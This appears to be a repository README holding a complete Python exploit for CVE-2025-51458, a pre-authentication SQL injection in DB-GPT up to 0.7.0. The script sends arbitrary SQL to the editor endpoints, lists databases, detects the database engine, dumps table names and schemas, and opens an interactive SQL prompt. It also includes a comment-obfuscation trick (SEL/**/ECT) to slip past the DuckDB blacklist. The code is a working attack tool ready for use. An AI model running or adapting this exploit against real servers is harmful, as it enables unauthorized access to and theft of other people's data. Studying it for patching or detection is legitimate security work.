README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection
Affected: eosphoros-ai/DB-GPT <= 0.7.0
Endpoint: /api/v1/editor/sql/run, /api/v1/editor/chart/run
Type: Pre-Auth SQL Injection (bypass of CVE-2024-10835 / CVE-2024-10901 fix)
The sanitize_sql blacklist only covers DuckDB. MySQL/PostgreSQL/SQLite
connections pass raw SQL directly to query_ex() with no filtering.
DuckDB blacklist can be bypassed with comment obfuscation (SEL/**/ECT).
Usage:
python3 exp.py <target> <db_name> [--sql "SELECT ..."]
python3 exp.py <target> <db_name> --dump-tables
python3 exp.py <target> <db_name> --dump-db
python3 exp.py <target> --list-dbs
"""
import argparse
import json
import sys
import requests
def sql_run(target, db_name, sql):
url = f"{target.rstrip('/')}/api/v1/editor/sql/run"
payload = {"db_name": db_name, "sql": sql}
try:
r = requests.post(url, json=payload, timeout=30)
data = r.json()
if data.get("success"):
result = data.get("data", {})
columns = result.get("colunms", [])
values = result.get("values", [])
return columns, values
else:
print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr)
return None, None
except Exception as e:
print(f"[-] Request failed: {e}", file=sys.stderr)
return None, None
def chart_run(target, db_name, sql, chart_type="bar"):
url = f"{target.rstrip('/')}/api/v1/editor/chart/run"
payload = {"db_name": db_name, "sql": sql, "chart_type": chart_type}
try:
r = requests.post(url, json=payload, timeout=30)
data = r.json()
if data.get("success"):
return data.get("data", {})
else:
print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr)
return None
except Exception as e:
print(f"[-] Request failed: {e}", file=sys.stderr)
return None
def list_databases(target):
url = f"{target.rstrip('/')}/api/v1/editor/db/list"
try:
r = requests.get(url, timeout=10)
data = r.json()
if data.get("success"):
return data.get("data", [])
return None
except Exception as e:
print(f"[-] Request failed: {e}", file=sys.stderr)
return None
def print_table(columns, values):
if not columns:
return
widths = [len(str(c)) for c in columns]
for row in values:
for i, v in enumerate(row):
widths[i] = max(widths[i], len(str(v) if v else "NULL"))
header = " | ".join(str(c).ljust(widths[i]) for i, c in enumerate(columns))
sep = "-+-".join("-" * w for w in widths)
print(header)
print(sep)
for row in values:
line = " | ".join(
str(v if v else "NULL").ljust(widths[i]) for i, v in enumerate(row)
)
print(line)
print(f"\n({len(values)} rows)")
def detect_db_type(target, db_name):
# Try MySQL
cols, vals = sql_run(target, db_name, "SELECT VERSION()")
if cols and vals:
version = str(vals[0][0]).lower()
if "mariadb" in version or "." in version:
return "mysql" if "mariadb" not in version else "mariadb"
# Try PostgreSQL
cols, vals = sql_run(target, db_name, "SELECT version()")
if cols and vals and "postgresql" in str(vals[0][0]).lower():
return "postgresql"
# Try SQLite
cols, vals = sql_run(target, db_name, "SELECT sqlite_version()")
if cols and vals:
return "sqlite"
return "unknown"
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection"
)
parser.add_argument("target", help="Target URL (e.g. http://localhost:5670)")
parser.add_argument("db_name", nargs="?", help="Database name")
parser.add_argument("--sql", help="Custom SQL to execute")
parser.add_argument(
"--list-dbs", action="store_true", help="List available databases"
)
parser.add_argument(
"--dump-tables", action="store_true", help="Dump table names"
)
parser.add_argument(
"--dump-db", action="store_true", help="Dump all table structures"
)
parser.add_argument(
"--chart", action="store_true", help="Use chart endpoint instead"
)
parser.add_argument(
"--duckdb-bypass",
action="store_true",
help="Use comment obfuscation for DuckDB",
)
args = parser.parse_args()
print(f"[*] CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection")
print(f"[*] Target: {args.target}")
if args.list_dbs:
dbs = list_databases(args.target)
if dbs:
print(f"\n[+] Found {len(dbs)} database(s):")
for db in dbs:
name = db.get("db_name", db) if isinstance(db, dict) else db
db_type = db.get("db_type", "?") if isinstance(db, dict) else "?"
print(f" - {name} ({db_type})")
else:
print("[-] No databases found or endpoint not accessible")
return
if not args.db_name:
parser.error("db_name is required unless using --list-dbs")
if args.sql:
sql = args.sql
if args.duckdb_bypass:
sql = sql.replace("SELECT", "SEL/**/ECT")
print(f"[*] Executing: {sql}\n")
cols, vals = sql_run(args.target, args.db_name, sql)
if cols:
print_table(cols, vals)
return
if args.dump_tables:
db_type = detect_db_type(args.target, args.db_name)
print(f"[*] Detected DB type: {db_type}")
if db_type in ("mysql", "mariadb"):
sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE()"
elif db_type == "postgresql":
sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'"
elif db_type == "sqlite":
sql = "SELECT name FROM sqlite_master WHERE type='table'"
else:
sql = "SELECT table_name FROM information_schema.tables"
print(f"[*] Dumping tables...\n")
cols, vals = sql_run(args.target, args.db_name, sql)
if cols:
print_table(cols, vals)
return
if args.dump_db:
db_type = detect_db_type(args.target, args.db_name)
print(f"[*] Detected DB type: {db_type}")
if db_type in ("mysql", "mariadb"):
sql = (
"SELECT table_name, column_name, data_type "
"FROM information_schema.columns "
"WHERE table_schema = DATABASE() "
"ORDER BY table_name, ordinal_position"
)
elif db_type == "postgresql":
sql = (
"SELECT table_name, column_name, data_type "
"FROM information_schema.columns "
"WHERE table_schema = 'public' "
"ORDER BY table_name, ordinal_position"
)
elif db_type == "sqlite":
# SQLite: get tables first, then PRAGMA for each
cols, vals = sql_run(
args.target,
args.db_name,
"SELECT name FROM sqlite_master WHERE type='table'",
)
if cols and vals:
for row in vals:
table = row[0]
print(f"\n[*] Table: {table}")
tc, tv = sql_run(
args.target,
args.db_name,
f"PRAGMA table_info('{table}')",
)
if tc:
print_table(tc, tv)
return
else:
sql = "SELECT table_name, column_name, data_type FROM information_schema.columns"
print(f"[*] Dumping schema...\n")
cols, vals = sql_run(args.target, args.db_name, sql)
if cols:
print_table(cols, vals)
return
# Default: interactive mode
print(f"[*] Database: {args.db_name}")
print(f"[*] Interactive SQL mode. Type 'exit' to quit.\n")
while True:
try:
sql = input("SQL> ").strip()
except (EOFError, KeyboardInterrupt):
print()
break
if not sql or sql.lower() == "exit":
break
if args.duckdb_bypass:
sql = sql.replace("SELECT", "SEL/**/ECT")
cols, vals = sql_run(args.target, args.db_name, sql)
if cols:
print_table(cols, vals)
print()
if __name__ == "__main__":
main()